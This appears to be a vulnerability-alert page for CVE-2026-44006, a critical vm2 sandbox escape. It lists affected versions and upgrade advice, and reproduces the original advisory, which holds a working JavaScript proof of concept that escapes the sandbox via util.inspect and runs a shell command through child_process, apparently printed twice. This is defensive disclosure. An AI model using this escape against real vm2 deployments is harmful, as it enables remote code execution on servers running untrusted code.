Monitor vulnerabilities like this one.
Sign up free to get alerted when software you use is affected.
10.0
CVE-2026-44006: vm2 Sandbox Escape Allows Remote Code Execution
GHSA-qcp4-v2jj-fjx8
CVE-2026-44006
Summary
The vm2 library has a security flaw that could allow an attacker to execute malicious code on a server. This could happen if a developer uses vm2 to run untrusted code. To protect against this, update to the latest version of vm2 and ensure that untrusted code is properly sandboxed or validated.
What to do
- Update GitHub Actions vm2 to version 3.11.0.
- Update vm2 to version 3.11.0.
Affected software
| Ecosystem | Vendor | Product | Affected versions |
|---|---|---|---|
| npm | GitHub Actions | vm2 |
<= 3.10.5 Fix: upgrade to 3.11.0
|
| npm | – | vm2 |
<= 3.10.5 Fix: upgrade to 3.11.0
|
Original title
vm2 has a Sandbox Escape Vulnerability
Original description
### Summary
It is possible to reach `BaseHandler.getPrototypeOf`, which can be used to get arbitrary prototypes
### Details
https://github.com/patriksimek/vm2/blob/408fc855f1cc1bbc2985b029465ee0e732ada433/lib/bridge.js#L655-L658
`BaseHandler` can be reached via `util.inspect` (same as https://github.com/patriksimek/vm2/commit/57971fa423abeb66f09e47e18102986549474ca8)
### PoC
```js
let obj = {
subarray: Buffer.prototype.inspect,
slice: Buffer.prototype.slice,
hexSlice: () => '',
};
let sym;
obj.slice(10, {
showHidden: true,
showProxy: true,
depth: 10,
stylize(a) {
const handler = this.seen && this.seen[1];
if (handler && handler.getPrototypeOf) {
gP = handler.getPrototypeOf;
HObjectProto = gP(gP(gP(gP(Buffer))));
HObject = HObjectProto.constructor;
sym = HObject.getOwnPropertySymbols(Buffer.prototype).at(0);
}
return a;
},
});
obj = {
[sym]: (depth, opt, inspect) => {
inspect.constructor('return process')()
.getBuiltinModule('child_process')
.execSync('id', { stdio: 'inherit' });
},
valueOf: undefined,
constructor: undefined,
};
WebAssembly.compileStreaming(obj).catch(() => {});
```
### Impact
Sandbox Escape -> RCE
It is possible to reach `BaseHandler.getPrototypeOf`, which can be used to get arbitrary prototypes
### Details
https://github.com/patriksimek/vm2/blob/408fc855f1cc1bbc2985b029465ee0e732ada433/lib/bridge.js#L655-L658
`BaseHandler` can be reached via `util.inspect` (same as https://github.com/patriksimek/vm2/commit/57971fa423abeb66f09e47e18102986549474ca8)
### PoC
```js
let obj = {
subarray: Buffer.prototype.inspect,
slice: Buffer.prototype.slice,
hexSlice: () => '',
};
let sym;
obj.slice(10, {
showHidden: true,
showProxy: true,
depth: 10,
stylize(a) {
const handler = this.seen && this.seen[1];
if (handler && handler.getPrototypeOf) {
gP = handler.getPrototypeOf;
HObjectProto = gP(gP(gP(gP(Buffer))));
HObject = HObjectProto.constructor;
sym = HObject.getOwnPropertySymbols(Buffer.prototype).at(0);
}
return a;
},
});
obj = {
[sym]: (depth, opt, inspect) => {
inspect.constructor('return process')()
.getBuiltinModule('child_process')
.execSync('id', { stdio: 'inherit' });
},
valueOf: undefined,
constructor: undefined,
};
WebAssembly.compileStreaming(obj).catch(() => {});
```
### Impact
Sandbox Escape -> RCE
ghsa CVSS3.1
10.0
Vulnerability type
CWE-94
Code Injection
- https://github.com/patriksimek/vm2/security/advisories/GHSA-qcp4-v2jj-fjx8
- https://github.com/patriksimek/vm2/blob/408fc855f1cc1bbc2985b029465ee0e732ada433...
- https://github.com/patriksimek/vm2/releases/tag/v3.11.0
- https://github.com/advisories/GHSA-qcp4-v2jj-fjx8
- https://nvd.nist.gov/vuln/detail/CVE-2026-44006
Published: 7 May 2026 · Updated: 28 May 2026 · First seen: 7 May 2026